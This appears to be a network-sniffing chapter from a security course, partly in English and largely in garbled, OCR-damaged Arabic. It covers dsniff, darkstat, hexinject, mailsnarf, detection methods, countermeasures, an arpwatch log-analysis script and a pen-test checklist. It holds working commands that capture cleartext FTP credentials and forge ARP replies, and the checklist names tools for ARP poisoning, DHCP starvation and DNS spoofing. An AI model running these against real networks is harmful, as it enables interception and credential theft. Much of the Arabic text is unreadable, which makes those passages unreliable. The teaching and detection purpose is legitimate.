#dsniff [-c] [-d] [-m] [-n] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile]
[expression]

Once the tool is installed, run dsniff -h to display all of its options.

To run dsniff on the network interface with automatic protocol detection:

#dsniff -i eth0 -m

-i eth0 makes dsniff listen on the eth0 interface; -m enables automatic protocol detection.

dsniff output:

dsniff: listening on eth0



20/08/13 18:54:53 tcp 192.168.2.20.36761 -> 192.168.2.22.21 (ftp)
USER user
PASS user01

dsniff captured the FTP login (user name and password) sent in clear text.



Packet Sniffer Tools: Darkstat 



Source: http://unix4lyfe.org/darkstat

Darkstat is a packet sniffer that runs as a background process, gathers network statistics and serves them over HTTP. It is a small, lightweight network traffic monitor that helps with bandwidth (Bandwidth) analysis and network troubleshooting. It presents per-host (host/ip) statistics with the traffic each host has sent and received and the ports in use.

darkstat [ -i interface ] [ -r file ] [ --snaplen bytes ] [ --pppoe ] [ --syslog ] [ --verbose ] [ --no-daemon ]
[ --no-promisc ] [ --no-dns ] [ --no-macs ] [ --no-lastseen ] [ -p port ] [ -b bindaddr ] [ -f filter ] [ -l
network/netmask ] [ --local-only ] [ --chroot dir ] [ --user username ] [ --daylog filename ] [ --import
filename ] [ --export filename ] [ --pidfile filename ] [ --hosts-max count ] [ --hosts-keep count ] [ --ports-
max count ] [ --ports-keep count ] [ --highest-port port ] [ --wait secs ] [ --hexdump ]

Running Darkstat

Darkstat serves its statistics through a web interface (with deflate compression). For example, to have darkstat sniff on eth0 and serve its web interface on port 81:

#darkstat -p 81 -i eth0

Then open http://<serverIP or Hostname>:81 in a browser to see the statistics, as in the following figure.



[Screenshot: darkstat web interface, Graphs page: "Running for 28 days, 7 hrs, 56 mins, 16 secs, since 2007-09-01 14:42:34 EST+1000. Total 66,302,367,236 bytes in 161,674,953 packets", with traffic graphs for the last 24 hours and the last 31 days and a "reload graphs" button.]



#darkstat -b 127.0.0.1 (or) <yournewIP> 

Persistent DNS resolution is disabled with the "-n" option:

#darkstat -n 

Use "--no-promisc" to stop "darkstat" from putting the interface into "promiscuous mode":

#darkstat --no-promisc

To filter the captured traffic use the "-f" option with a capture filter:

#darkstat -f "port not 22"

#darkstat -i eth0 -f "not (src net 192.168.0 and dst net 192.168.0)"



Packet injector: Hexinject 



Hexinject is a versatile packet injector and sniffer that provides a command-line framework for raw network access. It is designed to work together with other command-line utilities, and for this reason it facilitates the creation of powerful shell scripts capable of reading, intercepting and modifying network traffic in a transparent manner.
Hexinject 1.5 [hexadecimal packet injector/sniffer]
written by: Emanuele Acri <crossbower@gmail.com>

Usage:
    hexinject <mode> <options>

Options:
    -s            sniff mode
    -p            inject mode

    -r            raw mode (instead of the default hexadecimal mode)
    -f <filter>   custom pcap filter
    -i <device>   network device to use
    -F <file>     pcap file to use as device (sniff mode only)
    -c <count>    number of packets to capture
    -t <time>     sleep time in microseconds (default 100)
    -l            list all available network devices

Injection options:
    -C            disable automatic packet checksum
    -S            disable automatic packet size

Interface options:
    -P            disable promiscuous mode
    -M            put the wireless interface in monitor mode
                  (experimental: use airmon-ng instead...)

Other options:
    -h            help screen



Besides injecting arbitrary packets, hexinject automatically fixes the checksum and size fields of the TCP/IP headers of the packets it injects, so they stay valid on the wire; the -C and -S options above disable these two features.



Hexinject as Sniffer 

Hexinject can be used as a sniffer: it prints the packets captured from the network either in hex or in raw form. For example:



root@JANA:~# hexinject -s -i eth0




To list the HTTP Host headers seen in the captured traffic:

#hexinject -s -i eth0 -r | strings | grep 'Host:'



[Screenshot: output of the command above, one line per captured request: Host: www.google.com, Host: www.google.com.eg, Host: clients1.google.com, Host: www1.aircrack-ng.org and several repetitions of Host: www.aircrack-ng.org.]



The -r option makes hexinject print the "raw dump" of each packet; "strings" extracts the printable text from it, and "grep" searches that text for the Host header.
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Hexinject as Injector 

Hexinject also works as an injector, selected with the -p option. The packet to send can be given in hexadecimal or raw form. For example:

#echo "01 02 03 04" | hexinject -p -i eth0



[Screenshot: Wireshark showing the injected frame: Frame 8 (4 bytes on wire, 4 bytes captured), flagged as [Malformed Packet], with the bytes 01 02 03 04.]



The following example uses hexinject to capture a single ARP request from the network and re-inject it as an ARP reply by rewriting the opcode field:

#hexinject -s -i eth0 -c 1 -f 'arp' | replace '06 04 00 01' '06 04 00 02' | hexinject -p -i eth0

[Screenshot: Wireshark with the display filter "arp". Frame 6 is the captured request "Who has 192.168.1.47? Tell 192.168.1.9" from DigitalE_00:0a:04 to Broadcast; frame 7 is the injected reply "192.168.1.9 is at aa:00:04:00:0a:04". The decode of frame 7 shows Opcode: reply (0x0002), [Is gratuitous: False], Sender MAC address: DigitalE_00:0a:04 (aa:00:04:00:0a:04), Sender IP address: 192.168.1.9 (192.168.1.9). Bytes:
0000  ff ff ff ff ff ff aa 00 04 00 0a 04 08 06 00 01
0010  08 00 06 04 00 02 aa 00 04 00 0a 04 c0 a8 01 09]

This example shows how pipes connect two hexinject instances (one sniffing, one injecting) with other command-line tools such as "replace". The "-f" option takes a pcap filter, here 'arp'; the pcap filter syntax is described at http://www.manpagez.com/man/7/pcap-filter .

Hexinject with USB

Because the pcap libraries support capturing from USB, Hexinject can also sniff USB traffic. In the example below the traffic of a USB mouse is captured on the usbmon3 interface.



[Screenshot: hexinject -s -i usbmon3 run as root, printing each captured USB mouse packet as a line of hex bytes.]
#sudo hexinject -s -i usbmon3 | awk -f mouse_click.awk
left click
click released
central click
click released
left+right click
click released





Hexinject 1.5 also ships with a tool named prettypacket, which decodes a raw packet into its labelled header fields, as in the following example:



[Screenshot: prettypacket output for a captured UDP packet. It lists the Ethernet header (destination and source hardware address, type), the IP header (version, header length, ToS/DSCP, total length, ID, flags and fragment offset, TTL, protocol, checksum, source and destination address), the UDP header (source and destination port, length, checksum) and the payload bytes.]



Mailsnarf outputs the e-mail messages sniffed from SMTP and POP traffic in Berkeley mbox format:

#mailsnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]

Pattern: a regular expression matched against the captured messages (with -v, the messages that do not match are saved). Expression: a filter expression in tcpdump syntax.

Example:

#mailsnarf -v "BEGIN PGP MESSAGE" | perl -ne 'print if /^From / .. /^$/;' | tee insecure-mail-headers



NEMESIS

http://nemesis.sourceforge.net
Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. It is well suited for testing network intrusion detection systems, firewalls, IP stacks and a variety of other tasks. Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets.
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Additional Sniffing Tools 

Besides the tools presented above there are many other sniffing tools. The following list gives the most common ones together with the sites they can be obtained from:

Ace Password Sniffer available at http://www.effetech.com
RSA Netwitness Investigator available at http://www.emc.com
Big-Mother available at http://www.tupsoft.com
EtherDetect Packet Sniffer available at http://www.etherdetect.com
EffeTech HTTP Sniffer available at http://www.effetech.com
Ntop available at http://www.ntop.org
Smartsniff available at http://www.nirsoft.net
EtherApe available at http://etherape.sourceforge.net
Network Probe available at http://www.objectplanet.com
Snort available at http://www.snort.org
MaaTec Network Analyzer available at http://www.maatec.com
Alchemy Network Monitor available at http://www.mishelpers.com
CommView available at http://www.tamos.com
NetResident available at http://www.tamos.com
Kismet available at http://www.kismetwireless.net
AIM Sniffer available at http://www.effetech.com
Netstumbler available at http://www.netstumbler.com
IE HTTP Analyzer available at http://www.ieinspector.com
Ministumbler available at http://www.netstumbler.com
PacketMon available at http://www.analogx.com
NADetector available at http://www.nsauditor.com
Microsoft Network Monitor available at http://www.microsoft.com
NetworkMiner available at http://www.netresec.com
PRTG Network Monitor available at http://www.paessler.com
Network Security Toolkit available at http://www.networksecuritytoolkit.org
Ethereal available at http://www.ethereal.com
KSniffer available at http://ksniffer.sourceforge.net
IPgrab available at http://ipgrab.sourceforge.net
WebSiteSniffer available at http://www.nirsoft.net
ICQ Sniffer available at http://www.etherboss.com
URL Helper available at http://www.urlhelper.com
WebCookiesSniffer available at http://www.nirsoft.net
York available at http://thesz.diecru.eu
IP Traffic Spy available at http://www.networkdls.com
SniffPass available at http://www.nirsoft.net
Cocoa Packet Analyzer available at http://www.tastycocoabytes.com
vxSniffer available at http://www.cambridgevx.com
Sniffer Penetration Testing

^jjajj <^-!^ .Ai^iu^l a£^juJI c>5 ic A^jj sniffing ti^lj^t ~ i^jLujj j£tg-Il q\ \ ^pia 

>c ^Jj LftS 3 > A \\\ cA£auA\ jlkV sniffing ^ ^*>»il ^ig-xJI c 




i^Ull J£.ui3l ^ qiia j& U£ ;4£jj^3I l^Iuu^I CjIj^VI 








'("Spoofed") ^ j ARP J-jV ARP Spoofing ^oii^ <uli t( _i^JI jl^J! 4i j** j :4 SjkiJt 












;^U3I Jl^JI ^ qua j& t(MITM) < «>^"* ^ J^j ^ j^a ^^-(ijaaj 
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A ui\ uiaJl dlLa j1*_a3| £-|j^lull ^ £ dJ ^jVI .A-la - gall (JjS ^ ^LJlol^llj <ioJj>Jl CAjLuIt <j£ ^JjJ f^S ^ <J^' l6 * J^^l 





[Figure: the sniffing attack flow used in the pen test. An attacker connects his laptop to a switch port. He runs discovery tools to learn about network topology. The traffic destined for the victim machine is redirected to the attacker. The hacker extracts passwords and sensitive data from the redirected traffic.]




8.8 Countermeasures against Sniffing (Countermeasures)



Having seen how sniffing attacks are carried out and the tools used for them, we now turn to the countermeasures that an organization should apply to protect its network against sniffing.



Defending against Sniffing

Some of the countermeasures that help to defend against sniffing:
- Restrict physical access to the network media (Network Media) so that a Packet Sniffer cannot be installed.
- Use encryption to protect sensitive information.
- Permanently add the MAC address of the gateway (Gateway) to the ARP cache.
- Use static (Static) IP addresses and static ARP tables to prevent attackers from adding spoofed ARP entries for machines on the network.
- Turn off network identification broadcasts (network identification broadcasts) and, if possible, restrict the network to authorized users so that it cannot be discovered with sniffing tools.
- Use IPv6 instead of IPv4.
- Use encrypted sessions such as SSH instead of Telnet, Secure Copy (SCP) instead of FTP and SSL for e-mail connections, which protects wireless network users in particular against sniffing.
- Use HTTPS instead of HTTP to protect user names and passwords.

- Use a switch instead of a hub, because a switch delivers data only to the intended recipient.
- Use a crossover cable for direct connections where possible, since it removes hubs and switches from the path.

- Protect devices and servers with authentication and passwords (Authentication Password).
.MAC <J-^^ ^lal 4_j^Loj!>UI J jl! <Jakjj jj jjUx^l! jtg-^. Jj^I j^I JJ°'**V Lajta 
.MAC JIa2jI 2^ liA s J^i31 ^Uaj V^j NIC c> Sj^W* MAC .atajU 
.promiscuous mode ^ jl! ^ J**j NIC a£j^3I cj jj£ ^! jl£ lit U ^j^j3 j^UI antisniff ^ 

• IP security (IPSec)
• PGP and S/MIME
• one-time passwords (OTPs)
• VPNs (virtual private networks)
• SSL/TLS
• SSH



Detecting Sniffing

Promiscuous Mode 

.promiscuous mode <^j^ J^j jUUjSI jjja'aS^j^ JaliSlb Jaiaa ^jL ^illj Sniffer ( ' q > ' 1< ^ <J$-^ c> 

^-jja jll ^ Jaxj c> jia^It tilJ^ 'Sniffer jj^ .^W^l ^ ^ Sniffer 

uj j 6 jjj^^ (traffic) ? A ^ J ^^ a1[Li Promiscuous mode .promiscuous mode 

DNS .^W^l jjj* ^ ^ ^U^l ( jt > ^ 1 ^ Standalone sniffers u^j^ c> J^ll 

.non-standalone sniffers ^^ki^ jl l^i^j (reverse DNS Lookup) c^^^ 
.Nmap t^Uajll ^ promiscuous mode ^ J\ Cf- ^£13 A^\lA\ ch\ ^ ji&l! ^Ua 

IDS

aL^I ^c, lA^II ^ ^^l^i ^1 ^Vl aJI ^ j intrusion detection system J ^ j (IDS) Jl^ll ^Uaj 

^sniffing 6 jf*^ JaL^ ^— 5 ^^/y j> ^l^^c-j-j ^j^j 4a£jJo3I C5 ic IDS cJ^^j .4^u*ll ^^ic sniffing 

'MAC spoofing 
Network Tools

^jjjUslSI ^ ^3^3^ (Jaa <jj^>sl!I ^ j^JI Ajja <jal^<J HP Performance Insight *!^VI l!^ ^^j^l j^i lS^*-*^ ^-^j' ^ 

/ alia a!1 CjjjjjlSlj ^jl ^<JI <£jjuj 4_jjj^<JI CAiUJ! JJ^jj ; 4 Ala. jjj ^j-d SbVl oi^ .4 laalftll 



Detecting Sniffing: Ping Method



.promiscuous mode ^ u?^ ^j^^Ji ^Uaill aj^j j-H^j Sniffer * — aj^SIS 

Qp. ^ ^Luj Uu» 'promiscuous mode ^jll ^ lUs c5^^ c> lA^II ^ ^ Ping ^iij^ lA£ ^jj Uj^^ 

^ Sniffer 

q\ jic j <j (j-aUJI IP jl <j Jl^aJI ping request J^jj <Jj J^Sa ^H^j jl c_j jLujVI 11a ^Ijj ^ ^jSall 
'(i^UaL V MAC u'j^ ^ Ethernet adapter lP^j^ u 1 c^^ 31 c> MAC 

(jli t^UilUj _<alia^ ]VIAC lP 3 ^^ tillil t . LiaJLujj sniffer *^ 3c ' lI^*^ ^ iLuL&]i jl^_aJI 
promiscuous <^j^ f^-^ t> ping cjLUojJ jjj Jjill jJ^I 4£^dl ^ ^ sniffer ^ ^ta^l^ 

^^ki^i axj ^& aLjL .non-promiscuous mode j^jll ^ lU^ ls^ ^Uidlj mode 



[Figure: detecting a sniffer with the ping method]
Promiscuous mode: Admin (10.0.0.4, 36-2E-3G-45-56-K2) sends a Ping message addressed to (10.0.0.1, AA:BB:CC:DD:EE:FF); the suspect machine (10.0.0.1, 11-22-33-44-55-66) answers: Response Received.
Non-promiscuous mode: the same Ping message (10.0.0.1, AA:BB:CC:DD:EE:FF) is sent; the suspect machine (10.0.0.1, 11-22-33-44-55-66) does not answer: No Response.




Detecting Sniffing: ARP Method



l ^U ^ ^1 sjSJI jli ^ (Node) ^S*ll 5^ J] non-broadcast ARP J- J ^ u yr* ^ 'M^ 1 6 ^ yr* 
ping message A? uVl o- 3 ^ ARP u'j^ (Cache) 03 j^j 4^ ^ promiscuous mode f^jll 
MAC u 1 yr^ ^ ^ MAC u'j^ u^j 4> o-^ 1 IP uL^ (Broadcast) 

Jaxj ^1 ^ ciL ^-aUJI broadcast ping ^UIujVI ^ s jiS jj^ (<i^ ^> j^ 5 ^ yr^) ^ o- 3 ^ 

^ Sniffer yr^ cf ( <^*j y?* e^ 3 ^ ^ 6 promiscuous mode <^j^ 



[Figure: detecting a sniffer with the ARP method]
Hosts: 192.168.168.1 (00-14-20-01-23-45), 192.168.168.2 (00-14-20-01-23-46), 192.168.168.3 (00-14-20-01-23-47). A Non-Broadcast ARP is sent to each host: only a machine in promiscuous mode (machine C) caches the ARP information (IP and MAC address mapping). A ping follows: a machine in promiscuous mode replies to the ping message (Ping Reply) as it has correct information about the host sending ping request in its cache; rest of the machines will send ARP probe (ARP Request) to identify the source of ping request.



Detecting Sniffing: DNS Method



jj^ aZj^ fcbjj DNS 



^ Sniffers ,DNS v> ji^V aLjUI ^ Reverse DNS Lookup 

<£jjaJ! ^^Ic jj jjia^II ^3^'^ .a£jjoJ! ^^ic Sniffers ^ j^-j I j^j^ uj^ clA^ a£jjoJI jjj-* ^^>^ ^ o^U^ll ,a£jjoJI 
Ua^j ^ DNS pSU .axj ^ J Ul^ Ul c^^i DNS ^'j^j o^j .promiscuous mode ^jJl ^ uj^ 

CIjULc; A^ajl l^l^klujl ^j^dj *^ ja. jjc; IP fj\ jic ICMP ^W^ 3 J^jj ^J^ 3 .^j' J^^ ^^^tJI DNS diLalx^ lj>laa3 

.sniffer * ^ > ^ >> n l^ji ^ ^-MUj tPing ^ ^ yr ja1 ^ DNS ^ -cr^^ DNS 
J] ICMP d^j] £ .promiscuous mode ^jll ^ jI^I jl caJ^JI yr" 1 ^ DNS 



[Figure: detecting a sniffer with the DNS method]
A Ping (192.168.0.1) is sent on the network; the host in promiscuous mode issues a Reverse DNS Lookup for the source address to the DNS Server. Hosts shown: 192.168.168.1 (00-14-20-01-23-45), 192.168.168.2 (00-14-20-01-23-46), 192.168.168.3 (00-14-20-01-23-47), and the DNS Server.




Detecting Sniffing: Source-Route Method



4iUbU ^ jiij .loose-source route ^ j*^ ^*J* source-route j tij^l <^l i> 6 ^ 

lU*j Router ^ ^>>JI cA^j jl g-MLj ^l^oij ^U>J3 IP Header -SI J^ta source-route Mji^l jt^ll 

jj A jU^I Al« . C jU^I Routing jjj^I Disable lU*j ^ . . C jB jA Upl 

ajI^IU Router jl Jl a2L*J1 A J^j] ^ . B jU^I c^l d^ i>j C jU^I ul 4-*>JI 

^jj ^Lg^JI ^jli (ILLm AilajU LLaii) j^j - ^ V C ? ^ UJ^ ( ; *j u^ ■ C j^?^ C5-SI ^ ^ ' 0 j! ♦ f J^ 3 j1.ui.a3I ^jU ^ jjj *L<»^JI 
^ j^JI c_LLoijj ILjaixi j^JI Spl jl> ^jIj Promiscuous Mode t^j^^ B jU^^ uj^ u^j DROP 

.Sniffer J^»j B ^W^^ cr^s -U^ ^ j^W ^ H+j* 

29 30 u 1 ^ J TTL -Si lU^ eJ ii >! jl^ <> ^ ^>J1 TTL -SI ^ j c^j^Vl aIUJ! 

jj^<u]| A-ilxxj ^3 C uj ( ♦ H M1 - j 6^.1 j jj^j <ia^<i ^j-<i djj-G <^13i j 29 W TTL j B ls^^ l! > ^ > >1 
A C5 ic ^jj ^jj^ ^UlUj (Sniffing jj <L* _pJl ialiiilU ^la < v-v) 30 W^^j B jW^SI ^ L "^ 1 ^ j ^3^SI u!^ 

. . . Sniffer B jyi ^ j ^ c?H!! 30 ^ ^j^ 3 TTL -SI 

Detecting Sniffing: Decoy Method

. Telnet j FTP j j '^ti^l jj jU^ jl Virtual Machine J ^ - ^ <j ^jij U J£ <Ljia3l ^ 

j] ^JUlUj Plain Text a a 1 ^^jj cJ^ 1 c^^- WS jjj^I ^aKj ^^jjoixJI ^jujI J^jj ^ WS^ cjLq^JI ^jU l-ajj^ 



<li l^Liau s n iff urk \ /Ml liA e Ua axjj .^LUjIU ^jii^ ciLi <jU a<^\ Sniffer 

t^lc til^jc Sniff lS-**^ L^^l jW^Sl ^—^1 L " ^ UJ^ C^S^^J ^J^l ^ 6 ^ ( jA < Q > lkljaui3i ^.Ldjujl <Jajuj| J J^-^l ^ ^ a 

Network ^5^* j sj^^ ^1 ^LLj^jj <J>uu ^jl ^1 _a£jjoi3I ^jujIj jIa^» ^^Ic (Jasu L^jI Aij^Ul oi^ CjI ji* 

.^f^l c> ^ >JI (Sniffer) j ^ uj^ 5 ul cr^^ Source-Route L> ^ Segment 

.Decoy ul ^ j^ 1 .Honey pot JIa^Ij ^ aLjUi ^ Jjij j^j uJa 
Detecting Sniffing: TDR (Time Domain Reflectometers)

^ Reflected Energy ^£xi<JI AiLkll (jjxlud^ll dis jll l_jLoi^. J!>lk AiLo^JI l-jLo^. ^jj^j ls 1c axuxj <Lj]a3l 
Electrical Pulses ^^j^ ^AjJ^j JLuj jU TDR .CjI jbl jllj jUjjuJI ^ <Lxlu^l (jjJall . 

.l$Jj£i ^^jll (jj^iall ^glc UUj liLuJ (JJ^J CjliLauJ! L-jL J J^J^J l*Jia . . . <95fL<Jl CAjujI^juYI cs - ^ * ^J^J (^5^ 

(jl^-ftj Ethernet TAP j] ^ 1 ^ ^ CjliLab<JI <jj Lajj ,4£jJo3I ^^Ic <la jjj-* ^ o^j^ 

^ j£i c _^j3I Hardware * c ^ *^ *l jf*^ £j ^ * >1 J W^-^ el) - * j (JLA^ l>* t — LA ^ ^ t Aij^Ui £>1a ^ j 
.ajUU ciuL^ J^Ai Ujja.j ^ 3JV^ ^jVit" Vj lUjj V yr^J ^f*^ Sniffing ji Packet Capturing 



Detecting Sniffing: Network Latency

J jj^a jll ( yialaaJ ^ IxJa .Sniff f C> j] ^ ^ J ■ ■ ■ Load J -la ^j Ja AjIc^ ^1 ^CPU C> S 

<^.l^Jj 4i^joj dbaaJ C _^A IxJa .<!LaJl oi^ Ai^atxi yialuaJ ^SA A£l±uA\ C5 Jc Flood cJ-^ j' (J^ J^*j ^ J' (J^ J^-^ ^J^J^ 

.P^jSj ^la£i ^ ^WUj l^ialSj S^i.ffl DOS lU»J 5LjS1 



oIaj ^211 cjI jj! Liajl dllfe ,4lxuJI ^ Sniffer ^£ Jj^ ^Vt t$i j^l rw^mt ^1 jjtll 6^ 

.Alfwlt ^ Sniffer 6^ < nSU Qjtt^ *\\ ^> l^a)±kluul 



Sniffing Detection Tools



Tool: Arpwatch

4£jJa3l (MAC CteJ^ j IP ^—^j^j iaUij j>» ^^ic til^cLaaj ^illj jAj^aSI ^ jjLg ^Ujj Arpwatch 

W 1 ?- MAC ol^j IP ojj^ cjI^jI^ c> 2^ .Ethernet/ip cl^j^^ c^j s^Uj hqi^i j 

# arpwatch -i eth0

< aUll cjYU^I J^k ^> t*lli ii^^j cJ^a <^3all ^ IP jl MAC u' MAC lS^» jj ^ UK <c*13i3 

./var/log/message CjVU^I J\ /var/log/syslog 



# tail -f /var/log/messages

Sample Output

Apr 15 12:45:17 tecmint arpwatch: new station 172.16.16.64 d0:67:e5:c:9:67
Apr 15 12:45:19 tecmint arpwatch: new station 172.16.25.86 0:d0:b7:23:72:45
Apr 15 12:45:19 tecmint arpwatch: new station 172.16.25.86 0:d0:b7:23:72:45
Apr 15 12:45:19 tecmint arpwatch: new station 172.16.25.86 0:d0:b7:23:72:45
Apr 15 12:45:19 tecmint arpwatch: new station 172.16.25.86 0:d0:b7:23:72:45
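The arpwatch messages above are the raw material for spotting ARP poisoning: an IP address that suddenly shows up with a different MAC. As an added example (not from the book and not part of arpwatch itself), the following Python script parses such syslog lines, normalizes arpwatch's zero-stripped MAC notation, and flags every IP whose MAC differs from the one first learned. The "new station" lines come from the sample output; the "new activity", "changed ethernet address" and "flip flop" lines are constructed for this example.

```python
import re

# Constructed syslog excerpt: the two "new station" lines from the sample
# output above, followed by constructed lines in the other message shapes
# arpwatch writes ("new activity", "changed ethernet address", "flip flop").
SAMPLE_LOG = """\
Apr 15 12:45:17 tecmint arpwatch: new station 172.16.16.64 d0:67:e5:c:9:67
Apr 15 12:45:19 tecmint arpwatch: new station 172.16.25.86 0:d0:b7:23:72:45
Apr 15 12:46:02 tecmint arpwatch: new activity 172.16.25.86 0:d0:b7:23:72:45
Apr 15 12:47:40 tecmint arpwatch: changed ethernet address 172.16.25.86 0:11:22:33:44:55 (0:d0:b7:23:72:45)
Apr 15 12:47:41 tecmint arpwatch: flip flop 172.16.25.86 0:d0:b7:23:72:45 (0:11:22:33:44:55)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) arpwatch: "
    r"(?P<kind>new station|new activity|changed ethernet address|flip flop) "
    r"(?P<ip>\d+(?:\.\d+){3}) (?P<mac>[0-9a-f:]+)(?: \((?P<old>[0-9a-f:]+)\))?$"
)

def normalize_mac(mac: str) -> str:
    """arpwatch drops leading zeros (d0:67:e5:c:9:67); pad each octet to two digits."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def parse_line(line: str):
    """Return the fields of one arpwatch syslog line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["mac"] = normalize_mac(rec["mac"])
    if rec["old"]:
        rec["old"] = normalize_mac(rec["old"])
    return rec

def analyze_arpwatch_log(text: str):
    """Alert on every line where an IP's MAC differs from the first MAC learned for it."""
    learned = {}  # ip -> first MAC seen for that ip
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        first = learned.setdefault(rec["ip"], rec["mac"])
        # "changed ethernet address" and "flip flop" are arpwatch's own change
        # notices; a differing MAC on any other line is flagged as well.
        if rec["mac"] != first or rec["kind"] in ("changed ethernet address", "flip flop"):
            alerts.append({"ts": rec["ts"], "ip": rec["ip"], "kind": rec["kind"],
                           "expected": first, "seen": rec["mac"]})
    return alerts

if __name__ == "__main__":
    for a in analyze_arpwatch_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']}: {a['kind']} (expected {a['expected']}, seen {a['seen']})")
```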
Tool: L0pht AntiSniff

Source: http://gbppr.dyndns.org/10pht/antisniff/download.html
.promiscuously ^ jL jjill j Ethernet/IP u j^^ if- ' sbi ^ AntiSniff 

^jja jll c Lijja^ll <jl£ lij L* ^j^i3 CjI jUlkVl ^1 jj| a aa^a AntiSniff 6 nons witched ^Jc- J-**^ ^ s>a 

c> g^ljji aj^j y-L Uij .promiscuous mode 

• DNS tests 

• Operating-system-specific tests 

• Network and machine latency tests 



http://www.microsoft.com/
U Ai^j ji .promiscuous mode t^j^ 4£f£JI ^Lkj ^\ lJU£&)} c*U PromqryUI ^^Vl 
^U^l jl£ lij .promiscuous mode f^jll ^ lU*^ ^->U^lj ^U*j modern managed Windows system 

.^Uajll ^ Jaxj Sniffing Ajw J] j^4i ^ ^ 'promiscuous mode ^jll ^ ^h^j ^ 




[Screenshot: PromqryUI, with its Systems To Query, Results and Query Status panes]
PromqryUI is a security tool from Microsoft that can be used to detect network interfaces that are running in promiscuous mode.
8.9 Sniffing Pen Testing



dibLiaxJ! Liajl liuiSlj .Sniffing (i'j^VI J 1 *I^V CjIj^VIj ^ j^JI CjLj£ij t<^pUI ^a&lLJI U>.^U ^ c^jVi 

^Ai^JjaixJl Jc Sniffing (jlj^^ jW-*^ ^^>^.V ^""^ U*^ ■ * 4_xJal<Jl JJ^*^ L>* W%f^ 

i^jJal\ J ^jVI djL* Jc J jj^aJI J^J Ai^jjauJI a£jJo3I J Aj^L^xJI C5 1c Sniffing ^ li<Au ^ U£ 

jlkl j/i^ ^ ciljj .Sniffing 1— iI&^a .ua Ai^lauJI a£jjuJI 4 jffi ^WTi l_a jjoj 
lij U ^j^j til^Loij l_a jjoj Sniffing i^jlkl jLjlkl .Sniffing t^yinn Jll jlii^V Sniffing ^ j?** 
J j>**ll ^luu Sniffing $ J&>\ J-£^ .(interception attacks) o^lj^VI CjU^a jl Sniffing c> £jj ls^ 4£^ll 

, jLjall jl^all <J^J (j-a <£jjuJl JJ^ (i^^ 

.iSijiSI jjj* VPN jSSL ^Jl 

rogue sniffing ci^j ^^>*j 
J rogue DNS j rogue DHCP ^» > ^USSI - 

.jift^l g ^11 <J*ij U»Ldj sniffing ^ ^ ^ sI£Ia^ 4^ ^j^-^t ^> ^ji ^ll^j tiijli JjljlkVI jLii^U ^-^Jl 

jUlkl CjI jiaaJI ^juli* J] . j^-A^^ lW-^I jjUaill ^AjJaj li& j ,a£jjoJI sniffing ^ 4i£-<uJI JjjuJI j <Jj^ 
;4_ilU3l Sniffing i^jlkVl jtf^l <«- >l ^ Iaaj U jc^ .^.^ 1 ^ <J£Jdjj ^I^j ^1 jlkVI ^.1^1 L5 lc til^cLaaj ^^Ij j^^-Vl 

Step 1: Perform MAC flooding

CjULiJI Jl ffi > ^ jj^aLJI m\a\\ ialL<JI ls^\ ^^W^ ' ^ j^' ^ (jl lLli^ 'failopen mode j^l ci^^ 

.macof j Yersinia 
Step 2: Perform DHCP starvation

^ Sjjal <^H(JI DHCP f ^ udj^ iUiLojl ^^jj t3_nx^ 3Jaij Ak, ^Uv^ll MAC u^j^ t° DHCP ^-A^ ^ 
^U. ^Uj ^XoxJI DHCP ^W^ 3 ^j^- dijuolill ^^ja j^l^lt jli JiA dj^. lij 

.Gobbler j Dhcpstarv ^1 j^i ^l^i^U DHCP starvation ^l^j .DHCP rouge 

Step 3: Perform a rogue server attack

ip qiJlic> DHCP cjUIU <jUi^VIj A^fdll J rogue DHCP ?iL J^-^ ci^j^ c> rogue server djU^A iiiii 

Step 4: Perform ARP poisoning

dIa Jxij jl ^jWimi lil . jl^J ip jjAj dii^ MAC u^j^ j&^l ARP Table $ Jj^ 

Ufasoft SNIFj ^WinArpAttacker 'Cain & Abel ^1 e 1 ^ 1 ^> <> e^ 31 

Step 5: Perform MAC spoofing

lij JjS ^ 4£jj^3U Jl^aJ MAC u' Jj^- ,^j>^1 Ailkj MAC u' (spoof) lP^jI SlSLa^ JjU. 

jl^a c^IjLj jaUsuII J^Lk ^ CjLdlLJl jl <Li^ jjll ftj^l Jc J jj^a jib a^jH aj! jj aa] <ijl£^J tilU^i ^Uill Jc I j^IS Cln£ 

.SMAC £j! j^i ^I^L^I JjjL 
Step 6: Perform IRDP spoofing

m 2uc jill Jc < LuiaJ ) Jj spoofed IRDP router advertisement J^j J^-jj (j&J^ c> IRDP spoofing ^ 
jl£ lit .V ^ I advertisement messages J^ J-^ ^ ^ Cjbl^l jj j\ jll jl^ ^15 lij U ji^i 

t q > ^T^ l J j ^-jIa^a jI/j 'passive sniffing 'Dos c ^jJal jSVI jl^JI jj*jj ^IS jjj! jll 

(MITM) 
Step 7: Perform DNS spoofing

Aja^al i <^ jj fclc] jo 6 jUo j& DNS Spoofing .arpspoof/dnsspoof ^jj£j ^l^ki^U DNS Spoofing ^ 

(JjS (J^iixJl JP <jl jjc £xa AjL^JjojVI (JjuJJJj ^i^J^all DNS L , A (J^J^S f £ ^ 6 (* J?£^ ^ J -~ ^ 6 ^ *J J trt C5^) 
Jc Jali^Jl ^Tjn tdjL^gJl j-d ^ jill 11a t . g a\\ £3 Jj 4_i^jJa3l jj o^lcj JU3Lj .4 > ^1 ^Uail 4_ilxi3l AA a^LujVl <J jj^ j 

IDS/IPS 
Step 8: Perform cache poisoning

c_jjj3I ^q > ^^ J Cf uo£ J jj ^SLJI cjtal^j ^jL ^illj 3 j^ > ^ 1 jl^ J^jji jj cal^ 3 cache poisoning ^ 

Step 9: Perform proxy server DNS poisoning

t^jj proxy server ^j^t i> ^ J .Sniffing ^ jUi^V Proxy Server DNS Poisoning ^3 

.^1^*1] C;r ^jjJI {SL 4 j^ » ^ t ^ .^^jjJI ^Uaj J primary DNS entry ^ rogue DNS 

Step 10: Document the results

■ (<<n ? J (jj '^A^VI CjI^suII AjJaxjj lg_L<i L_fl^Jlj 



